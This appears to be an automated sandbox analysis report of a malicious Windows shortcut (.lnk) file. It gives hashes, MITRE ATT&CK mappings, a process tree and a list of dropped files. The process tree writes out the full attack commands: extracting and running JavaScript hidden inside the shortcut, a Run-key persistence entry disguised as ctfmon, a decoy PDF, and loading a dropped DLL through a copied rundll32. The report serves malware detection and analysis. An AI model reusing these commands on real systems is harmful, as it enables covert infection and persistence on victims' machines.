7c87451261dfce64fda987eb395694b5330fd958466c46c931440cd9dc227505

Analysis

max time kernel
144s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10/04/2024, 07:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7c87451261dfce64fda987eb395694b5330fd958466c46c931440cd9dc227505.lnk
Size

265KB
MD5

996580c90c5efe2a727d22a77b7e69eb
SHA1

c6c65bf93081e4af6dcf24cb6be6cbd533eaa415
SHA256

7c87451261dfce64fda987eb395694b5330fd958466c46c931440cd9dc227505
SHA512

c64d54692ee234014b57ebf57cb69baf8b965668f09b76533533abc54a1751108d11afd47a4db1c34b2eb08ee8fa906697c218404952fa97d7dbfab61ff42022
SSDEEP

6144:8t4XBZPUnEDOTLAfO/2XXnJZyRYMIgHyWzfYxg:8t4XoOOTuO/2nn6TSkQxg

Score

7^/10

persistence

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
1964	rundll32.exe

Loads dropped DLL 4 IoCs

pid	Process
1964	rundll32.exe
1964	rundll32.exe
1964	rundll32.exe
1964	rundll32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\CTFM0N.EXE = "cmd /c start C:\\Users\\Admin\\AppData\\Local\\Temp\\ctfmon.bat"	cscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

pid	Process
2808	AcroRd32.exe
1964	rundll32.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1964	rundll32.exe
2808	AcroRd32.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2808	AcroRd32.exe
2808	AcroRd32.exe
2808	AcroRd32.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 2032 wrote to memory of 2896	2032	cmd.exe	29
PID 2032 wrote to memory of 2896	2032	cmd.exe	29
PID 2032 wrote to memory of 2896	2032	cmd.exe	29
PID 2896 wrote to memory of 2584	2896	cmd.exe	30
PID 2896 wrote to memory of 2584	2896	cmd.exe	30
PID 2896 wrote to memory of 2584	2896	cmd.exe	30
PID 2896 wrote to memory of 2468	2896	cmd.exe	31
PID 2896 wrote to memory of 2468	2896	cmd.exe	31
PID 2896 wrote to memory of 2468	2896	cmd.exe	31
PID 2896 wrote to memory of 2760	2896	cmd.exe	32
PID 2896 wrote to memory of 2760	2896	cmd.exe	32
PID 2896 wrote to memory of 2760	2896	cmd.exe	32
PID 2760 wrote to memory of 2752	2760	cscript.exe	33
PID 2760 wrote to memory of 2752	2760	cscript.exe	33
PID 2760 wrote to memory of 2752	2760	cscript.exe	33
PID 2760 wrote to memory of 2572	2760	cscript.exe	34
PID 2760 wrote to memory of 2572	2760	cscript.exe	34
PID 2760 wrote to memory of 2572	2760	cscript.exe	34
PID 2752 wrote to memory of 2808	2752	cmd.exe	37
PID 2752 wrote to memory of 2808	2752	cmd.exe	37
PID 2752 wrote to memory of 2808	2752	cmd.exe	37
PID 2752 wrote to memory of 2808	2752	cmd.exe	37
PID 2760 wrote to memory of 2708	2760	cscript.exe	38
PID 2760 wrote to memory of 2708	2760	cscript.exe	38
PID 2760 wrote to memory of 2708	2760	cscript.exe	38
PID 2708 wrote to memory of 1972	2708	cmd.exe	40
PID 2708 wrote to memory of 1972	2708	cmd.exe	40
PID 2708 wrote to memory of 1972	2708	cmd.exe	40
PID 1972 wrote to memory of 1964	1972	cmd.exe	41
PID 1972 wrote to memory of 1964	1972	cmd.exe	41
PID 1972 wrote to memory of 1964	1972	cmd.exe	41
PID 1972 wrote to memory of 1964	1972	cmd.exe	41
PID 1972 wrote to memory of 1964	1972	cmd.exe	41
PID 1972 wrote to memory of 1964	1972	cmd.exe	41
PID 1972 wrote to memory of 1964	1972	cmd.exe	41
PID 2760 wrote to memory of 1620	2760	cscript.exe	42
PID 2760 wrote to memory of 1620	2760	cscript.exe	42
PID 2760 wrote to memory of 1620	2760	cscript.exe	42

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\7c87451261dfce64fda987eb395694b5330fd958466c46c931440cd9dc227505.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2032
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c DIR 007629965203812111640254143179\01524813550762405048 & for /f "delims=" %a in ('dir /S/b *.lnk C:\Users\Admin\AppData\Local\Temp\*.lnk') do (if %~za gtr 93393 (findstr /b "var onm=" "%a" > C:\Users\Admin\AppData\Local\Temp\~254134656.js & cscript C:\Users\Admin\AppData\Local\Temp\~254134656.js 9&exit))&cls
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /S/b *.lnk C:\Users\Admin\AppData\Local\Temp\*.lnk
    3⤵
    PID:2584
- - C:\Windows\system32\findstr.exe
    findstr /b "var onm=" "C:\Users\Admin\AppData\Local\Temp\7c87451261dfce64fda987eb395694b5330fd958466c46c931440cd9dc227505.lnk"
    3⤵
    PID:2468
- - C:\Windows\system32\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp\~254134656.js 9
    3⤵
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:2760
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start C:\Users\Admin\AppData\Local\Temp\account.pdf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2752
    - - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
        
        "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\account.pdf"
        5⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:2808
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\rundll32.exe /y
      4⤵
      PID:2572
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\ctfmon.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2708
    - - C:\Windows\system32\cmd.exe
        
        cmd /c start rundll32.exe MSADOCG.DLL,DllUnregisterServer
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1972
      - C:\Users\Admin\AppData\Local\Temp\rundll32.exe
        
        rundll32.exe MSADOCG.DLL,DllUnregisterServer
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:1964
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del /q C:\Users\Admin\AppData\Local\Temp\~254134656.js
      4⤵
      PID:1620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\DPLAY.LIB

Filesize
35KB

MD5
f4b1528911b6cce7abba58d87c3c2c10

SHA1
4b99b8d7de07fcf96cc667575bc83dae2449418a

SHA256
66982ebd5ebb75633723c7057a1e948ac3aafe3ff808397eb0c55c853c82f9e6

SHA512
540794c669da902331d004abbd8e8a4589d7019257cae9a67086c8de0ad0bb463ac14276961067104adbcdc7ab477253fd1a8a5d93aa96833dcedaf834ea70e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSADOCG.DLL

Filesize
102KB

MD5
77afbb6a6b85eecaad65d15e066476ec

SHA1
d087874940617cab3254f09389806d03a1336e31

SHA256
38c815729f34aef6af531edf3f0c3f09635686dbe7e5db5cb97eca5b2b5b7712

SHA512
5211df683de5e9a46d39a58a54b8440196e31b2803d77668b273d4cd8697dc5fb7ba5dcd903e258207c6be05a13d6e688c5a63348f2849e25047fead61b76d0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\account.pdf

Filesize
44KB

MD5
f86f4204b915222382b7f528982e3808

SHA1
96471f04d69464b42162d70324a3f08cd9003ac0

SHA256
a655499c165b3056370c05e0861a5f6a09db2e581e1461f27ade9c9ca18d2850

SHA512
5a9f665da4a4d7ae0d8bf166af1ac5b03f78199ff9cd54c55e5a2f419d9f22eaf180ba3800be66bb7941dea51ecba59da3de9c1969a5604b8cfcab2d1b6eefaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\ctfmon.bat

Filesize
76B

MD5
eac72dff542f3465320f1ef235754832

SHA1
7d6e8ff68fbb442c10d7606da1fe8020a1f733a9

SHA256
7cacdc84a0d690564c8471a4f58ab192ef7d9091ab0809933f616010bbf6846a

SHA512
52fa0161d785bf7bb3aa9c2330a06d9ff4623d2d459a3624214d9ff5d98af12cb2dee54392ab909acf21e3e03cbc07f35ef46764e7715358ca60d3df38c47178

Download Submit
C:\Users\Admin\AppData\Local\Temp\rundll32.exe

Filesize
43KB

MD5
51138beea3e2c21ec44d0932c71762a8

SHA1
8939cf35447b22dd2c6e6f443446acc1bf986d58

SHA256
5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124

SHA512
794f30fe452117ff2a26dc9d7086aaf82b639c2632ac2e381a81f5239caaec7c96922ba5d2d90bfd8d74f0a6cd4f79fbda63e14c6b779e5cf6834c13e4e45e7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\~254134656.js

Filesize
263KB

MD5
ecf6bffdc0358525bc2ab7dd7eed6b9e

SHA1
4fb249a7fbffeb32a730e2b491b1c5c42a131d73

SHA256
9d9a0af09fc9065bacabf1a193cad4386b5e8e5101639e07efa82992b723f3b0

SHA512
8468181156bc095ebba162bd2772e79803bbd911e2108b68d1dc2ade6b2a14733bd616e435613881a214f96d55167b7ded478215e1b1062f4f03098d3740435f

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
7a92cd803ab29cd3e0e9e80c227f3c41

SHA1
39613fc72cc1a3694b778eb64af183bba48f6f0b

SHA256
3d9ffa596a54bad3eb42076c3614ec106d206f86917da7d13bf61eae4c61ab39

SHA512
0d383e1b1943550c7e45f2e77be99ae6f7eec37a1d16c1c01e9fbe336e843602a8e2feb06b238204ffa27d274f7b16ec2fb095cb186a103729ffdaa9e2953201

Download Submit
memory/1964-79-0x0000000010000000-0x000000001001E000-memory.dmp

Filesize
120KB

Download
memory/1964-83-0x00000000002E0000-0x00000000002F2000-memory.dmp

Filesize
72KB

Download
memory/1964-84-0x00000000002E0000-0x00000000002F2000-memory.dmp

Filesize
72KB

Download
memory/1964-82-0x0000000000190000-0x0000000000199000-memory.dmp

Filesize
36KB

Download
memory/1964-77-0x0000000010000000-0x000000001001E000-memory.dmp

Filesize
120KB

Download
memory/1964-80-0x0000000010000000-0x000000001001E000-memory.dmp

Filesize
120KB

Download
memory/1964-102-0x0000000010000000-0x000000001001E000-memory.dmp

Filesize
120KB

Download
memory/1964-103-0x00000000002E0000-0x00000000002F2000-memory.dmp

Filesize
72KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads